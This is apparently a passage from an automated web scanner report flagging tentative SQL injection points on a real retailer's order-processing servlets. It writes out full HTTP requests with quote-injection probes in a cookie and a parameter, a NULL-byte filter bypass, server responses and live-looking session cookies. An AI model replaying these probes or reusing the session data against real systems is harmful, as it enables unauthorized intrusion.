THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

1.69. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [check parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderCalculate

Response 2 (redirected)

1.72. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate [s_vi cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderCalculate

Issue detail

The s_vi cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_vi cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]'; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 1

Request 2

GET /webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&quantity=1&catalogId=10053&orderItemId=330520025&orderItemId_0=330520025&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202562705&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]''; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224030708%3a%3bC25%5fEXP%3d1360064030%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630770%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cAAEK40iHMvaNnlKM1VWujt%2bxxi8%3d

Response 2

1.73. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay [catalogId parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.homedepot.com
Path:	/webapp/wcs/stores/servlet/OrderItemDisplay

Issue detail

The catalogId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catalogId parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /webapp/wcs/stores/servlet/OrderItemDisplay?jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&catalogId=10053%00'&quantity=1&orderItemId_0=330520025&orderItemId=330520025&langId=-1&catEntryId=202562705&storeId=10051&ddkey=OrderItemAdd HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224029646%3a%3bC25%5fEXP%3d1360064029%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630141%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cwD0O4YDr3%2f35oqr%2b4vJ6YCxfvjU%3d

Response 1 (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Content-Length: 207104
Expires: Thu, 16 Jun 2011 11:49:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:49:32 GMT
Connection: close
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224966318%3a%3bC25%5fEXP%3d1360064966%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:26 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224966318%3a%3bC25%5fEXP%3d1360064966%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:27 GMT;Path=/
Set-Cookie: THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%22115%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%24161%2c885%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816967%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224966318%3a%3bC25%5fEXP%3d1360064966%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000;Domain=.homedepot.com;Expires=Tue, 05-Feb-2013 11:49:27 GMT;Path=/
Set-Cookie: WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308228567648%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2cIo18Uw%2bNrkVVDLmy9wcANV3r%2f%2bE%3d;Domain=.homedepot.com;Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<html xm
...[SNIP]...

...[SNIP]...

Request 2

GET /webapp/wcs/stores/servlet/OrderItemDisplay?jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=129781024&catalogId=10053%00''&quantity=1&orderItemId_0=330520025&orderItemId=330520025&langId=-1&catEntryId=202562705&storeId=10051&ddkey=OrderItemAdd HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a1d5215-9eee-1ce7-9678-00e0ed0ed026; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=5; s_pers=%20s_campaign%3Dno%2520value%7C1308225830091%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225830097%3B%20p_30%3DSubcategory%7C1308225830104%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%255E%255E%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255Eoutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%2520%257C%2520%250A%2509%2509%2509%2509%2509%2509%2509%253Cspan%253EAdd%2520To%2520Cart%253C%252Fspan%253E%250A%2509%2509%2509%2509%2509%2509%2509%255E%255E%3B%20s_sq%3Dhomedepot%253D%252526pid%25253Doutdoors%2525253Eoutdoor%25252520power%25252520equipment%2525253Eriding%25252520mowers%2525253Egas%25252520riding%25252520mowers%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.homedepot.com%2525252Fwebapp%2525252Fwcs%2525252Fstores%2525252Fservlet%2525252FOrderItemAdd%2525253FstoreId%2525253D10051%25252526langId%2525253D-1%25252526catalogId_9%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224029646%3a%3bC25%5fEXP%3d1360064029%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227630141%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2081191%7c2081191%3b2025831%7cnull%7c%2d2000%5d%2cwD0O4YDr3%2f35oqr%2b4vJ6YCxfvjU%3d

Response 2 (redirected)

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 16 Jun 2011 11:49:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 11:49:41 GMT
Connection: close
